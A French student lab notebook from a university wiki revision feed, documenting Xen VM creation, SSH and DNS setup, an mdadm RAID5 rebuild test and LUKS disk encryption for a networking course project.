* bridge: IMA5sc&lt;br /&gt;
&lt;br /&gt;
    4) xl list&lt;br /&gt;
&lt;br /&gt;
       root@cordouan:~# xl list&lt;br /&gt;
       Name                                        ID   Mem VCPUs	State	Time(s)&lt;br /&gt;
       Domain-0                                     0  1993     8     r-----   52219.3&lt;br /&gt;
       karmeliett                                   1   128     1     -b----    2483.6&lt;br /&gt;
       duvel                                        2   512     1     -b----    4225.6&lt;br /&gt;
       deus                                         3   512     1     -b----    4226.4&lt;br /&gt;
       trappe                                       4   512     1     -b----    4082.4&lt;br /&gt;
       Rincecochon                                  6   512     1     -b----    3788.2&lt;br /&gt;
       IMA5-Durian                                 62   512     1     -b----    3237.7&lt;br /&gt;
       IMA5-BANANE                                 84   512     1     -b----     152.9&lt;br /&gt;
       IMA5-Papaye                                 89   512     1     -b----      35.4&lt;br /&gt;
       IMA5-Ananas                                 91   512     1     -b----      27.0&lt;br /&gt;
&lt;br /&gt;
On vérifie que la MV IMA5-BANANE a bien été créée.&lt;br /&gt;
&lt;br /&gt;
    5) xl console IMA5-BANANE&lt;br /&gt;
&lt;br /&gt;
On lance IMA5-BANANE en utilisant le log root et le mot de passe configuré.&lt;br /&gt;
&lt;br /&gt;
====&amp;lt;span style=&amp;quot;color:#4169E1&amp;quot;&amp;gt;Services Internet (SSH, DNS sécurisé et certificat SSL)&amp;lt;/span&amp;gt;====&lt;br /&gt;
&lt;br /&gt;
On configure à présent les services Internet après avoir acheté un nom de domaine (https://www.banane.space) sur gandi.net pour créer notre site Web sécurisé.&lt;br /&gt;
&lt;br /&gt;
=====&amp;lt;span style=&amp;quot;color:#6B8E23&amp;quot;&amp;gt;''Serveur SSH''&amp;lt;/span&amp;gt;=====&lt;br /&gt;
&lt;br /&gt;
Sur notre machine virtuelle, nous avons configuré le fichier sshd_config (PubkeyAuthentication ) :&lt;br /&gt;
&lt;br /&gt;
       root@IMA5-BANANE:~# vim /etc/ssh/sshd_config&lt;br /&gt;
       &lt;br /&gt;
       RSAAuthentication yes&lt;br /&gt;
       PubkeyAuthentication yes&lt;br /&gt;
       #AuthorizedKeysFile     %h/.ssh/authorized_keys&lt;br /&gt;
       PermitRootLogin yes&lt;br /&gt;
       &lt;br /&gt;
       root@IMA5-BANANE:~# service ssh restart&lt;br /&gt;
&lt;br /&gt;
=====&amp;lt;span style=&amp;quot;color:#6B8E23&amp;quot;&amp;gt;''Certification SSL''&amp;lt;/span&amp;gt;=====&lt;br /&gt;
&lt;br /&gt;
=====&amp;lt;span style=&amp;quot;color:#6B8E23&amp;quot;&amp;gt;''Serveur DNS''&amp;lt;/span&amp;gt;=====&lt;br /&gt;
&lt;br /&gt;
On commence par modifier les informations de notre nom de domaine sur le site de Gandi. Ensuite, dans ''&amp;quot;Gérer les Glue Records&amp;quot;'', nous modifions les informations concernant notre nom de domaine.&lt;br /&gt;
&lt;br /&gt;
* nom du serveur: ns.banane.space&lt;br /&gt;
* adresse IP: 193.48.57.179&lt;br /&gt;
* serveurs de nom:&lt;br /&gt;
** DNS1: ns.banane.space&lt;br /&gt;
** DNS2: ns6.gandi.net (serveur secondaire de Gandi)&lt;br /&gt;
&lt;br /&gt;
Une fois ces étapes effectuées, nous pouvons passer à la configuration du DNS avec bind. On se place alors dans le dossier /etc/bind de notre machine virtuelle.&lt;br /&gt;
Nous modifions dans un premier temps le fichier named.conf.local afin d'y créer nos zones :&lt;br /&gt;
&lt;br /&gt;
====&amp;lt;span style=&amp;quot;color:#4169E1&amp;quot;&amp;gt;Sécurisation des données&amp;lt;/span&amp;gt;====&lt;br /&gt;
&lt;br /&gt;
créez un RAID5 logiciel avec les trois partitions obtenues (utilisez le paquetage mdadm). Copiez des données sur le RAID5, arrêtez la machine virtuelle, retirez lui une des trois partitions, relancez la. Essayez de remonter votre RAID5, que constatez-vous ? &lt;br /&gt;
&lt;br /&gt;
    1) vi /etc/xen/IMA5-BANANE.cfg&lt;br /&gt;
       lvcreate -L 10G -n /dev/virtual/banane-1 -v&lt;br /&gt;
       lvcreate -L 10G -n /dev/virtual/banane-2 -v&lt;br /&gt;
       lvcreate -L 10G -n /dev/virtual/banane-3 -v&lt;br /&gt;
&lt;br /&gt;
       root@cordouan:~# cat /etc/xen/IMA5-BANANE.cfg&lt;br /&gt;
       #&lt;br /&gt;
       # Configuration file for the Xen instance IMA5-BANANE, created&lt;br /&gt;
       # by xen-tools 4.5 on Mon Sep 11 19:01:21 2017.&lt;br /&gt;
       #&lt;br /&gt;
       #&lt;br /&gt;
       #  Kernel + memory size&lt;br /&gt;
       #&lt;br /&gt;
       kernel      = '/boot/vmlinuz-3.16.0-4-amd64'&lt;br /&gt;
       extra       = 'elevator=noop'&lt;br /&gt;
       ramdisk     = '/boot/initrd.img-3.16.0-4-amd64'&lt;br /&gt;
       vcpus       = '1'&lt;br /&gt;
       memory      = '512'&lt;br /&gt;
       #&lt;br /&gt;
       #  Disk device(s).&lt;br /&gt;
       #&lt;br /&gt;
       root        = '/dev/xvda2 ro'&lt;br /&gt;
       disk        = [&lt;br /&gt;
                  'file:/usr/local/xen/domains/IMA5-BANANE/disk.img,xvda2,w',&lt;br /&gt;
                  'file:/usr/local/xen/domains/IMA5-BANANE/swap.img,xvda1,w',&lt;br /&gt;
                  'phy:/dev/virtual/IMA5-BANANE-home,xvdb1,w',&lt;br /&gt;
  		  'phy:/dev/virtual/IMA5-BANANE-var,xvdc1,w',&lt;br /&gt;
                  'phy:/dev/virtual/banane-1,xvdd,w',&lt;br /&gt;
                  'phy:/dev/virtual/banane-2,xvde,w',&lt;br /&gt;
                  'phy:/dev/virtual/banane-3,xvdf,w',		 &lt;br /&gt;
       #&lt;br /&gt;
       #  Physical volumes&lt;br /&gt;
       #&lt;br /&gt;
       #&lt;br /&gt;
       #  Hostname&lt;br /&gt;
       #&lt;br /&gt;
       name        = 'IMA5-BANANE'  &lt;br /&gt;
       #&lt;br /&gt;
       #  Networking&lt;br /&gt;
       #&lt;br /&gt;
       vif         = [ 'ip=193.48.57.179/28 ,mac=00:16:3E:56:71:47,bridge=IMA5sc' ]       &lt;br /&gt;
       #&lt;br /&gt;
       #  Behaviour&lt;br /&gt;
       on_poweroff = 'destroy'&lt;br /&gt;
       on_reboot   = 'restart'&lt;br /&gt;
       on_crash    = 'restart'&lt;br /&gt;
&lt;br /&gt;
On reconfigure le fichier IMA5-BANANE.cfg en créant 3 nouvelles partitions LVM banane-X de 1 Go associées à notre VM.&lt;br /&gt;
&lt;br /&gt;
    2) xl console IMA5-BANANE&lt;br /&gt;
&lt;br /&gt;
On relance la MV IMA5-BANANE.&lt;br /&gt;
&lt;br /&gt;
    3) apt-get install mdadm&lt;br /&gt;
&lt;br /&gt;
Nous avons ensuite installé mdadm puis rebooté la MV.&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
nous créons le volume /dev/md0:&lt;br /&gt;
mdadm --create /dev/md0 --level=5 --assume-clean --raid-devices=3 /dev/xvdd /dev/xvde /dev/xvdf&lt;br /&gt;
&lt;br /&gt;
créez un RAID5 logiciel avec les trois partitions obtenues (utilisez le paquetage mdadm)&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
 root@IMA5-BANANE:~# mdadm --detail /dev/md0&lt;br /&gt;
 /dev/md0:&lt;br /&gt;
        Version : 1.2&lt;br /&gt;
  Creation Time : Wed Oct 25 18:27:13 2017&lt;br /&gt;
     Raid Level : raid5&lt;br /&gt;
     Array Size : 2095104 (2046.34 MiB 2145.39 MB)&lt;br /&gt;
  Used Dev Size : 1047552 (1023.17 MiB 1072.69 MB)&lt;br /&gt;
   Raid Devices : 3&lt;br /&gt;
  Total Devices : 3&lt;br /&gt;
    Persistence : Superblock is persistent&lt;br /&gt;
    Update Time : Wed Oct 25 17:03:20 2017&lt;br /&gt;
          State : clean &lt;br /&gt;
 Active Devices : 3&lt;br /&gt;
 Working Devices : 3&lt;br /&gt;
 Failed Devices : 0&lt;br /&gt;
  Spare Devices : 0&lt;br /&gt;
         Layout : left-symmetric&lt;br /&gt;
     Chunk Size : 512K&lt;br /&gt;
           Name : IMA5-BANANE:0  (local to host IMA5-BANANE)&lt;br /&gt;
           UUID : b70ad336:fb198d84:a5909f1c:f4b33229&lt;br /&gt;
         Events : 2&lt;br /&gt;
    Number   Major   Minor   RaidDevice State&lt;br /&gt;
       0     202       48        0      active sync   /dev/xvdd&lt;br /&gt;
       1     202       64        1      active sync   /dev/xvde&lt;br /&gt;
       2     202       80        2      active sync   /dev/xvdf&lt;br /&gt;
&lt;br /&gt;
///&lt;br /&gt;
&lt;br /&gt;
 root@IMA5-BANANE:~# mdadm --detail /dev/md0&lt;br /&gt;
 /dev/md0:&lt;br /&gt;
        Version : 1.2&lt;br /&gt;
  Creation Time : Wed Oct 25 18:27:13 2017&lt;br /&gt;
     Raid Level : raid5&lt;br /&gt;
     Array Size : 2095104 (2046.34 MiB 2145.39 MB)&lt;br /&gt;
  Used Dev Size : 1047552 (1023.17 MiB 1072.69 MB)&lt;br /&gt;
   Raid Devices : 3&lt;br /&gt;
  Total Devices : 2&lt;br /&gt;
    Persistence : Superblock is persistent&lt;br /&gt;
    Update Time : Wed Oct 25 18:51:56 2017&lt;br /&gt;
          State : clean, degraded &lt;br /&gt;
 Active Devices : 2&lt;br /&gt;
 Working Devices : 2&lt;br /&gt;
 Failed Devices : 0&lt;br /&gt;
  Spare Devices : 0&lt;br /&gt;
         Layout : left-symmetric&lt;br /&gt;
     Chunk Size : 512K&lt;br /&gt;
           Name : IMA5-BANANE:0  (local to host IMA5-BANANE)&lt;br /&gt;
           UUID : b70ad336:fb198d84:a5909f1c:f4b33229&lt;br /&gt;
         Events : 12&lt;br /&gt;
    Number   Major   Minor   RaidDevice State&lt;br /&gt;
       0       0        0        0      removed&lt;br /&gt;
       1     202       64        1      active sync   /dev/xvde&lt;br /&gt;
       2     202       80        2      active sync   /dev/xvdf&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
 root@IMA5-BANANE:~# cat /proc/mdstat&lt;br /&gt;
 Personalities : [raid6] [raid5] [raid4] &lt;br /&gt;
 md0 : active raid5 xvdd[3] xvde[1] xvdf[2]&lt;br /&gt;
      2095104 blocks super 1.2 level 5, 512k chunk, algorithm 2 [3/2] [_UU]&lt;br /&gt;
      [===========&amp;gt;.........]  recovery = 59.7% (627140/1047552) finish=0.2min speed=28506K/sec&lt;br /&gt;
 unused devices: &amp;lt;none&amp;gt;&lt;br /&gt;
 root@IMA5-BANANE:~# cat /proc/mdstat&lt;br /&gt;
 Personalities : [raid6] [raid5] [raid4] &lt;br /&gt;
 md0 : active raid5 xvdd[3] xvde[1] xvdf[2]&lt;br /&gt;
      2095104 blocks super 1.2 level 5, 512k chunk, algorithm 2 [3/2] [_UU]&lt;br /&gt;
      [============&amp;gt;........]  recovery = 64.5% (676392/1047552) finish=0.2min speed=29408K/sec     &lt;br /&gt;
 unused devices: &amp;lt;none&amp;gt;&lt;br /&gt;
 root@IMA5-BANANE:~# cat /proc/mdstat&lt;br /&gt;
 Personalities : [raid6] [raid5] [raid4] &lt;br /&gt;
 md0 : active raid5 xvdd[3] xvde[1] xvdf[2]&lt;br /&gt;
      2095104 blocks super 1.2 level 5, 512k chunk, algorithm 2 [3/2] [_UU]&lt;br /&gt;
      [=============&amp;gt;.......]  recovery = 66.2% (695080/1047552) finish=0.2min speed=28961K/sec     &lt;br /&gt;
 unused devices: &amp;lt;none&amp;gt;&lt;br /&gt;
 root@IMA5-BANANE:~# cat /proc/mdstat&lt;br /&gt;
 Personalities : [raid6] [raid5] [raid4] &lt;br /&gt;
 md0 : active raid5 xvdd[3] xvde[1] xvdf[2]&lt;br /&gt;
      2095104 blocks super 1.2 level 5, 512k chunk, algorithm 2 [3/2] [_UU]&lt;br /&gt;
      [=============&amp;gt;.......]  recovery = 68.1% (714664/1047552) finish=0.1min speed=28586K/sec&lt;br /&gt;
 unused devices: &amp;lt;none&amp;gt;&lt;br /&gt;
 root@IMA5-BANANE:~# cat /proc/mdstat&lt;br /&gt;
 Personalities : [raid6] [raid5] [raid4] &lt;br /&gt;
 md0 : active raid5 xvdd[3] xvde[1] xvdf[2]&lt;br /&gt;
      2095104 blocks super 1.2 level 5, 512k chunk, algorithm 2 [3/2] [_UU]&lt;br /&gt;
      [==================&amp;gt;..]  recovery = 94.6% (991996/1047552) finish=0.0min speed=29206K/sec   &lt;br /&gt;
 unused devices: &amp;lt;none&amp;gt;&lt;br /&gt;
 root@IMA5-BANANE:~# cat /proc/mdstat&lt;br /&gt;
 Personalities : [raid6] [raid5] [raid4] &lt;br /&gt;
 md0 : active raid5 xvdd[3] xvde[1] xvdf[2]&lt;br /&gt;
      2095104 blocks super 1.2 level 5, 512k chunk, algorithm 2 [3/3] [UUU]     &lt;br /&gt;
 unused devices: &amp;lt;none&amp;gt;&lt;br /&gt;
&lt;br /&gt;
====&amp;lt;span style=&amp;quot;color:#4169E1&amp;quot;&amp;gt;Cryptage des données&amp;lt;/span&amp;gt;====&lt;br /&gt;
&lt;br /&gt;
root@zebrasoma:/# cryptsetup luksFormat -c aes -h sha256 /dev/mmcblk1&lt;br /&gt;
root@zebrasoma:/# cryptsetup luksOpen /dev/sdb1 crypt_sd&lt;br /&gt;
root@zebrasoma:/# mkfs.ext4 /dev/mapper/crypt_sd&lt;br /&gt;
root@zebrasoma:/# mount /dev/mapper/crypt_sd /mnt&lt;br /&gt;
root@zebrasoma:/# vi /mnt/test.txt #on marque un texte dans le fichier&lt;br /&gt;
root@zebrasoma:/# umount /mnt&lt;br /&gt;
root@zebrasoma:/# cryptsetup luksClose crypt_sd&lt;br /&gt;
&lt;br /&gt;
====&amp;lt;span style=&amp;quot;color:#4169E1&amp;quot;&amp;gt;Mise en réseau de la MV Xen IMA5-BANANE&amp;lt;/span&amp;gt;====&lt;/div&gt;</summary>
		<author><name>Hdelatte</name></author>	</entry>

	<entry>
		<id>https://wiki-ima.plil.fr/mediawiki//index.php?title=Cahier_2017_groupe_n%C2%B05&amp;diff=46190</id>
		<title>Cahier 2017 groupe n°5</title>
		<link rel="alternate" type="text/html" href="https://wiki-ima.plil.fr/mediawiki//index.php?title=Cahier_2017_groupe_n%C2%B05&amp;diff=46190"/>
				<updated>2017-11-13T10:06:09Z</updated>
		
		<summary type="html">&lt;p&gt;Hdelatte : /* Sécurisation des données */&lt;/p&gt;
&lt;hr /&gt;
&lt;div&gt;==&amp;lt;span style=&amp;quot;color:#000080&amp;quot;&amp;gt;'''Présentation générale'''&amp;lt;/span&amp;gt;==&lt;br /&gt;
&lt;br /&gt;
===&amp;lt;span style=&amp;quot;color:#4169E1&amp;quot;&amp;gt;Mise en contexte&amp;lt;/span&amp;gt;===&lt;br /&gt;
&lt;br /&gt;
Le projet de Réseau Avancé est composé d'une partie commune et d'une tâche particulière par binôme. Ce projet consiste en la configuration d'une architecture réseau avec différentes parties, en plus du câblage et de la configuration des routeurs et commutateurs.&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
La partie commune consiste en la création et la mise en réseau d'une machine virtuelle; ainsi que la création d'un site sécurisé avec la configuration du serveur SSH, DNS sécurisé et du certificat SSL. La virtualisation permet de faire fonctionner sur une même machine plusieurs OS isolés ou des logiciels grâce aux machines virtuelles. Au-delà de la réduction des coûts, la virtualisation permet aussi de manipuler et gérer plus facilement des OS. Cependant, on s'oriente de plus en plus vers l'isolation par des conteneurs car ils permettent au sein d'un même OS, d'isoler les ressources matérielles et d'éviter des surcharges.&lt;br /&gt;
&lt;br /&gt;
Notre tâche particulière est donc de réaliser la gestion des conteneurs au sein d'une machine virtuelle configurée en réseau.&lt;br /&gt;
&lt;br /&gt;
===&amp;lt;span style=&amp;quot;color:#4169E1&amp;quot;&amp;gt;Tâches à effectuer&amp;lt;/span&amp;gt;===&lt;br /&gt;
&lt;br /&gt;
* Création d'une machine virtuelle sur le serveur de virtualisation Cordouan&lt;br /&gt;
* Mettre la machine virtuelle en réseau&lt;br /&gt;
* Configuration des services Internet (Serveur SSH, DNS, DNSSEC, Certificat SSL)&lt;br /&gt;
* Crackage de clé Wi-Fi&lt;br /&gt;
* Créer les différents conteneurs et configurer leur accès au réseau (tâche particulière)&lt;br /&gt;
&lt;br /&gt;
==&amp;lt;span style=&amp;quot;color:#000080&amp;quot;&amp;gt;'''Travail effectué'''&amp;lt;/span&amp;gt;==&lt;br /&gt;
                     &lt;br /&gt;
====&amp;lt;span style=&amp;quot;color:#4169E1&amp;quot;&amp;gt;Création d'une machine virtuelle Xen sur Cordouan&amp;lt;/span&amp;gt;====&lt;br /&gt;
&lt;br /&gt;
On commence par créer une machine virtuelle Xen sur le serveur de virtualisation cordouan.insecserv.deule.net. On se connecte tout d'abord en SSH sur le serveur cordouan.&lt;br /&gt;
&lt;br /&gt;
    1) ssh root@cordouan.insecserv.deule.net&lt;br /&gt;
       Mot de passe: mot de passe root habituel&lt;br /&gt;
&lt;br /&gt;
On précise:&lt;br /&gt;
&lt;br /&gt;
* le nom de machine virtuelle: IMA5-BANANE&lt;br /&gt;
* son adresse IP sur le réseau: 193.48.57.179/28&lt;br /&gt;
* le répertoire où créer les disques virtuels: /usr/local/xen&lt;br /&gt;
* le miroir Debian: http://debian.polytech-lille.fr/debian&lt;br /&gt;
* la distribution: jessie (qui est la distribution stable courante)&lt;br /&gt;
&lt;br /&gt;
    2) xen-create-image --hostname=&amp;lt;IMA5-BANANE&amp;gt; --ip 193.48.57.179/28 --dir /usr/local/xen --netmask=255.255.255.240 --gateway=193.48.57.177 --mirror=http://debian.polytech-lille.fr/debian/ --dist=jessie&lt;br /&gt;
&lt;br /&gt;
On modifie le fichier de configuration de la machine virtuelle pour faire en sorte que les répertoires var et home de la machine virtuelle soient sur des partitions LVM de l'hôte. Installez les paquetages nécessaires pour SSH, le serveur Web apache2 et le serveur DNS bind (voir la partie services).&lt;br /&gt;
&lt;br /&gt;
    3) xl create /etc/xen/IMA5-BANANE.cfg&lt;br /&gt;
       vi /etc/xen/IMA5-BANANE.cfg&lt;br /&gt;
       lvcreate -L 10G -n /dev/virtual/IMA5-BANANE-home -v&lt;br /&gt;
       lvcreate -L 10G -n /dev/virtual/IMA5-BANANE-var -v&lt;br /&gt;
&lt;br /&gt;
       root@cordouan:~# cat /etc/xen/IMA5-BANANE.cfg&lt;br /&gt;
       #&lt;br /&gt;
       # Configuration file for the Xen instance IMA5-BANANE, created&lt;br /&gt;
       # by xen-tools 4.5 on Mon Sep 11 19:01:21 2017.&lt;br /&gt;
       #&lt;br /&gt;
       #&lt;br /&gt;
       #  Kernel + memory size&lt;br /&gt;
       #&lt;br /&gt;
       kernel      = '/boot/vmlinuz-3.16.0-4-amd64'&lt;br /&gt;
       extra       = 'elevator=noop'&lt;br /&gt;
       ramdisk     = '/boot/initrd.img-3.16.0-4-amd64'&lt;br /&gt;
       vcpus       = '1'&lt;br /&gt;
       memory      = '512'&lt;br /&gt;
       #&lt;br /&gt;
       #  Disk device(s).&lt;br /&gt;
       #&lt;br /&gt;
       root        = '/dev/xvda2 ro'&lt;br /&gt;
       disk        = [&lt;br /&gt;
                  'file:/usr/local/xen/domains/IMA5-BANANE/disk.img,xvda2,w',&lt;br /&gt;
                  'file:/usr/local/xen/domains/IMA5-BANANE/swap.img,xvda1,w',&lt;br /&gt;
                  'phy:/dev/virtual/IMA5-BANANE-home,xvdb1,w',&lt;br /&gt;
  		  'phy:/dev/virtual/IMA5-BANANE-var,xvdc1,w',		 &lt;br /&gt;
       #&lt;br /&gt;
       #  Physical volumes&lt;br /&gt;
       #&lt;br /&gt;
       #&lt;br /&gt;
       #  Hostname&lt;br /&gt;
       #&lt;br /&gt;
       name        = 'IMA5-BANANE'  &lt;br /&gt;
       #&lt;br /&gt;
       #  Networking&lt;br /&gt;
       #&lt;br /&gt;
       vif         = [ 'ip=193.48.57.179/28 ,mac=00:16:3E:56:71:47,bridge=IMA5sc' ]       &lt;br /&gt;
       #&lt;br /&gt;
       #  Behaviour&lt;br /&gt;
       on_poweroff = 'destroy'&lt;br /&gt;
       on_reboot   = 'restart'&lt;br /&gt;
       on_crash    = 'restart'&lt;br /&gt;
&lt;br /&gt;
On modifie le fichier de configuration en faisant en sorte que les répertoires var et home de la machine virtuelle soient sur des partitions LVM de l'hôte:&lt;br /&gt;
&lt;br /&gt;
* la mémoire attribuée: 512 Mo&lt;br /&gt;
* l'adresse ip de la MV: 193.48.57.179/28&lt;br /&gt;
* bridge: IMA5sc&lt;br /&gt;
&lt;br /&gt;
    4) xl list&lt;br /&gt;
&lt;br /&gt;
       root@cordouan:~# xl list&lt;br /&gt;
       Name                                        ID   Mem VCPUs	State	Time(s)&lt;br /&gt;
       Domain-0                                     0  1993     8     r-----   52219.3&lt;br /&gt;
       karmeliett                                   1   128     1     -b----    2483.6&lt;br /&gt;
       duvel                                        2   512     1     -b----    4225.6&lt;br /&gt;
       deus                                         3   512     1     -b----    4226.4&lt;br /&gt;
       trappe                                       4   512     1     -b----    4082.4&lt;br /&gt;
       Rincecochon                                  6   512     1     -b----    3788.2&lt;br /&gt;
       IMA5-Durian                                 62   512     1     -b----    3237.7&lt;br /&gt;
       IMA5-BANANE                                 84   512     1     -b----     152.9&lt;br /&gt;
       IMA5-Papaye                                 89   512     1     -b----      35.4&lt;br /&gt;
       IMA5-Ananas                                 91   512     1     -b----      27.0&lt;br /&gt;
&lt;br /&gt;
On vérifie que la MV IMA5-BANANE a bien été créée.&lt;br /&gt;
&lt;br /&gt;
    5) xl console IMA5-BANANE&lt;br /&gt;
&lt;br /&gt;
On lance IMA5-BANANE en utilisant le log root et le mot de passe configuré.&lt;br /&gt;
&lt;br /&gt;
====&amp;lt;span style=&amp;quot;color:#4169E1&amp;quot;&amp;gt;Services Internet (SSH, DNS sécurisé et certificat SSL)&amp;lt;/span&amp;gt;====&lt;br /&gt;
&lt;br /&gt;
On configure à présent les services Internet après avoir acheté un nom de domaine (https://www.banane.space) sur gandi.net pour créer notre site Web sécurisé.&lt;br /&gt;
&lt;br /&gt;
=====&amp;lt;span style=&amp;quot;color:#6B8E23&amp;quot;&amp;gt;''Serveur SSH''&amp;lt;/span&amp;gt;=====&lt;br /&gt;
&lt;br /&gt;
Sur notre machine virtuelle, nous avons configuré le fichier sshd_config (PubkeyAuthentication ) :&lt;br /&gt;
&lt;br /&gt;
       root@IMA5-BANANE:~# vim /etc/ssh/sshd_config&lt;br /&gt;
       &lt;br /&gt;
       RSAAuthentication yes&lt;br /&gt;
       PubkeyAuthentication yes&lt;br /&gt;
       #AuthorizedKeysFile     %h/.ssh/authorized_keys&lt;br /&gt;
       PermitRootLogin yes&lt;br /&gt;
       &lt;br /&gt;
       root@IMA5-BANANE:~# service ssh restart&lt;br /&gt;
&lt;br /&gt;
=====&amp;lt;span style=&amp;quot;color:#6B8E23&amp;quot;&amp;gt;''Certification SSL''&amp;lt;/span&amp;gt;=====&lt;br /&gt;
&lt;br /&gt;
=====&amp;lt;span style=&amp;quot;color:#6B8E23&amp;quot;&amp;gt;''Serveur DNS''&amp;lt;/span&amp;gt;=====&lt;br /&gt;
&lt;br /&gt;
On commence par modifier les informations de notre nom de domaine sur le site de Gandi. Ensuite, dans ''&amp;quot;Gérer les Glue Records&amp;quot;'', nous modifions les informations concernant notre nom de domaine.&lt;br /&gt;
&lt;br /&gt;
* nom du serveur: ns.banane.space&lt;br /&gt;
* adresse IP: 193.48.57.179&lt;br /&gt;
* serveurs de nom:&lt;br /&gt;
** DNS1: ns.banane.space&lt;br /&gt;
** DNS2: ns6.gandi.net (serveur secondaire de Gandi)&lt;br /&gt;
&lt;br /&gt;
Une fois ces étapes effectuées, nous pouvons passer à la configuration du DNS avec bind. On se place alors dans le dossier /etc/bind de notre machine virtuelle.&lt;br /&gt;
Nous modifions dans un premier temps le fichier named.conf.local afin d'y créer nos zones :&lt;br /&gt;
&lt;br /&gt;
====&amp;lt;span style=&amp;quot;color:#4169E1&amp;quot;&amp;gt;Sécurisation des données&amp;lt;/span&amp;gt;====&lt;br /&gt;
&lt;br /&gt;
créez un RAID5 logiciel avec les trois partitions obtenues (utilisez le paquetage mdadm). Copiez des données sur le RAID5, arrêtez la machine virtuelle, retirez lui une des trois partitions, relancez la. Essayez de remonter votre RAID5, que constatez-vous ? &lt;br /&gt;
&lt;br /&gt;
    1) vi /etc/xen/IMA5-BANANE.cfg&lt;br /&gt;
       lvcreate -L 10G -n /dev/virtual/banane-1 -v&lt;br /&gt;
       lvcreate -L 10G -n /dev/virtual/banane-2 -v&lt;br /&gt;
       lvcreate -L 10G -n /dev/virtual/banane-3 -v&lt;br /&gt;
&lt;br /&gt;
       root@cordouan:~# cat /etc/xen/IMA5-BANANE.cfg&lt;br /&gt;
       #&lt;br /&gt;
       # Configuration file for the Xen instance IMA5-BANANE, created&lt;br /&gt;
       # by xen-tools 4.5 on Mon Sep 11 19:01:21 2017.&lt;br /&gt;
       #&lt;br /&gt;
       #&lt;br /&gt;
       #  Kernel + memory size&lt;br /&gt;
       #&lt;br /&gt;
       kernel      = '/boot/vmlinuz-3.16.0-4-amd64'&lt;br /&gt;
       extra       = 'elevator=noop'&lt;br /&gt;
       ramdisk     = '/boot/initrd.img-3.16.0-4-amd64'&lt;br /&gt;
       vcpus       = '1'&lt;br /&gt;
       memory      = '512'&lt;br /&gt;
       #&lt;br /&gt;
       #  Disk device(s).&lt;br /&gt;
       #&lt;br /&gt;
       root        = '/dev/xvda2 ro'&lt;br /&gt;
       disk        = [&lt;br /&gt;
                  'file:/usr/local/xen/domains/IMA5-BANANE/disk.img,xvda2,w',&lt;br /&gt;
                  'file:/usr/local/xen/domains/IMA5-BANANE/swap.img,xvda1,w',&lt;br /&gt;
                  'phy:/dev/virtual/IMA5-BANANE-home,xvdb1,w',&lt;br /&gt;
  		  'phy:/dev/virtual/IMA5-BANANE-var,xvdc1,w',&lt;br /&gt;
                  'phy:/dev/virtual/banane-1,xvdd,w',&lt;br /&gt;
                  'phy:/dev/virtual/banane-2,xvde,w',&lt;br /&gt;
                  'phy:/dev/virtual/banane-3,xvdf,w',		 &lt;br /&gt;
       #&lt;br /&gt;
       #  Physical volumes&lt;br /&gt;
       #&lt;br /&gt;
       #&lt;br /&gt;
       #  Hostname&lt;br /&gt;
       #&lt;br /&gt;
       name        = 'IMA5-BANANE'  &lt;br /&gt;
       #&lt;br /&gt;
       #  Networking&lt;br /&gt;
       #&lt;br /&gt;
       vif         = [ 'ip=193.48.57.179/28 ,mac=00:16:3E:56:71:47,bridge=IMA5sc' ]       &lt;br /&gt;
       #&lt;br /&gt;
       #  Behaviour&lt;br /&gt;
       on_poweroff = 'destroy'&lt;br /&gt;
       on_reboot   = 'restart'&lt;br /&gt;
       on_crash    = 'restart'&lt;br /&gt;
&lt;br /&gt;
On reconfigure le fichier IMA5-BANANE.cfg en créant 3 nouvelles partitions LVM banane-X de 1 Go associées à notre VM.&lt;br /&gt;
&lt;br /&gt;
    2) xl console IMA5-BANANE&lt;br /&gt;
&lt;br /&gt;
On relance la MV IMA5-BANANE.&lt;br /&gt;
&lt;br /&gt;
    3) apt-get install mdadm&lt;br /&gt;
&lt;br /&gt;
Nous avons ensuite installé mdadm puis rebooté la MV.&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
nous créons le volume /dev/md0:&lt;br /&gt;
mdadm --create /dev/md0 --level=5 --assume-clean --raid-devices=3 /dev/xvdd /dev/xvde /dev/xvdf&lt;br /&gt;
&lt;br /&gt;
créez un RAID5 logiciel avec les trois partitions obtenues (utilisez le paquetage mdadm)&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
 root@IMA5-BANANE:~# mdadm --detail /dev/md0&lt;br /&gt;
 /dev/md0:&lt;br /&gt;
        Version : 1.2&lt;br /&gt;
  Creation Time : Wed Oct 25 18:27:13 2017&lt;br /&gt;
     Raid Level : raid5&lt;br /&gt;
     Array Size : 2095104 (2046.34 MiB 2145.39 MB)&lt;br /&gt;
  Used Dev Size : 1047552 (1023.17 MiB 1072.69 MB)&lt;br /&gt;
   Raid Devices : 3&lt;br /&gt;
  Total Devices : 3&lt;br /&gt;
    Persistence : Superblock is persistent&lt;br /&gt;
    Update Time : Wed Oct 25 17:03:20 2017&lt;br /&gt;
          State : clean &lt;br /&gt;
 Active Devices : 3&lt;br /&gt;
 Working Devices : 3&lt;br /&gt;
 Failed Devices : 0&lt;br /&gt;
  Spare Devices : 0&lt;br /&gt;
         Layout : left-symmetric&lt;br /&gt;
     Chunk Size : 512K&lt;br /&gt;
           Name : IMA5-BANANE:0  (local to host IMA5-BANANE)&lt;br /&gt;
           UUID : b70ad336:fb198d84:a5909f1c:f4b33229&lt;br /&gt;
         Events : 2&lt;br /&gt;
    Number   Major   Minor   RaidDevice State&lt;br /&gt;
       0     202       48        0      active sync   /dev/xvdd&lt;br /&gt;
       1     202       64        1      active sync   /dev/xvde&lt;br /&gt;
       2     202       80        2      active sync   /dev/xvdf&lt;br /&gt;
&lt;br /&gt;
///&lt;br /&gt;
&lt;br /&gt;
 root@IMA5-BANANE:~# mdadm --detail /dev/md0&lt;br /&gt;
 /dev/md0:&lt;br /&gt;
        Version : 1.2&lt;br /&gt;
  Creation Time : Wed Oct 25 18:27:13 2017&lt;br /&gt;
     Raid Level : raid5&lt;br /&gt;
     Array Size : 2095104 (2046.34 MiB 2145.39 MB)&lt;br /&gt;
